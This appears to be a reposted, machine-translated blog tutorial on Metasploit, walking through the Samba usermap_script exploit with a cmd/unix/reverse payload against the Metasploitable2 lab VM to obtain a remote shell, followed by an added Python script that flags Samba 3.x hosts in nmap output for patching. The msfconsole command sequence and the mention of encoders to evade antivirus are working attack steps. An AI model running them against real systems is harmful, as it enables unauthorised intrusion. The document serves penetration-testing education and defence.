Metasploit penetration
2022-04-21 13:34:00 【just a leaf】
Preface
Metasploit is an open-source tool designed to make penetration testing easier. It is a modular framework written in the Ruby programming language, is highly extensible, and is easy for penetration testers to develop with.
One. Module composition of Metasploit
- Auxiliaries (auxiliary modules)
- Exploit (exploit modules)
- Payload (attack payload modules)
- Post (post-exploitation modules)
- Encoders (encoder modules)
Two. Attack steps
- Scan the target and its system
- Select and configure an exploit module
- Select and configure an attack payload module
- Choose an encoding technique, used to bypass antivirus software
- Carry out the penetration attack
Three. Exploit
Target preparation
Metasploitable2 is a purpose-built Ubuntu operating system used mainly for testing and demonstrating attacks on common vulnerabilities.
The download address is as follows:
https://information.rapid7.com/download-metasploitable-2017.html
Sign in with msfadmin as both the account and the password.

Usage procedure
Open msf in Kali
msfconsole

Scan the target's service versions
nmap -sV ip (here ip is the target's IP)
Collect the relevant information about the target, then choose the exploit and payload based on it
Select the vulnerability module
The scan here finds a Samba 3.x service
Use the search samba command to list the Samba exploits and select a suitable exploit module

The results are sorted according to how difficult the vulnerability is to exploit
Here the exploit/multi/samba/usermap_script exploit module is chosen
use exploit/multi/samba/usermap_script
show payloads (view the available attack payload modules)
show options (view the options the module needs in order to run)


Options marked yes here are parameters that must be set
Configure the vulnerability module
Set the selected attack payload module
set payload cmd/unix/reverse (note that the selected payload must match the target's operating system; here it is Linux)
Set the target IP
set RHOST 192.168.x.xxx
Set the port number to exploit
set RPORT 445
Set the IP of the host launching the attack
set LHOST 192.168.x.xxx

The attack
Launch the attack after setting the parameters
exploit (or run)
A shell connection is then established between the attacker and the target, and any command can be executed through it
Then enter commands such as hostname, uname -a, or ifconfig… to query the target
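An added example, not from the original post: from the defender's side, the same nmap -sV output can be checked across your own hosts for Samba 3.x banners, the finding that the walkthrough above starts from. The sample scan text, addresses and function names are constructed for illustration; a range banner such as 3.X - 4.X is reported as verify because nmap could not pin the major version.

```python
import re

# Constructed sample of `nmap -sV` normal output (not from the original page).
SAMPLE_SCAN = """\
Nmap scan report for 192.0.2.10
PORT    STATE SERVICE     VERSION
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

Nmap scan report for fileserver.example (192.0.2.20)
PORT    STATE    SERVICE     VERSION
445/tcp open     netbios-ssn Samba smbd 4.6.2
139/tcp filtered netbios-ssn

Nmap scan report for 192.0.2.30
PORT    STATE SERVICE     VERSION
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian
"""

HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?([^\s()]+)\)?$")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
SAMBA_RE = re.compile(r"Samba smbd (\d+)\.(\S+)(?: - (\d+)\.\S+)?")

def parse_services(scan_text):
    """Yield (host, port, state, version_banner) for every port line."""
    host = None
    for line in scan_text.splitlines():
        line = line.strip()
        m = HOST_RE.match(line)
        if m:
            host = m.group(1)          # IP, also when a hostname precedes it
            continue
        m = PORT_RE.match(line)
        if m and host:
            yield host, int(m.group(1)), m.group(3), m.group(5).strip()

def samba3_findings(scan_text):
    """Return [(host, port, verdict)] for open ports that may run Samba 3.x."""
    findings = []
    for host, port, state, banner in parse_services(scan_text):
        m = SAMBA_RE.search(banner)
        if state != "open" or not m:
            continue                   # closed/filtered ports and other services
        low, high = int(m.group(1)), m.group(3)
        if high is not None and low <= 3 <= int(high):
            findings.append((host, port, "verify"))   # range banner, e.g. 3.X - 4.X
        elif high is None and low == 3:
            findings.append((host, port, "samba3"))   # exact 3.x banner
    return findings
```

Hosts reported as samba3 or verify are the ones to patch, upgrade, or take off the network segment first.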
Copyright notice
This article was written by [just a leaf]. Please include a link to the original when reprinting. Thank you.
https://yzsam.com/2022/04/202204211332197902.html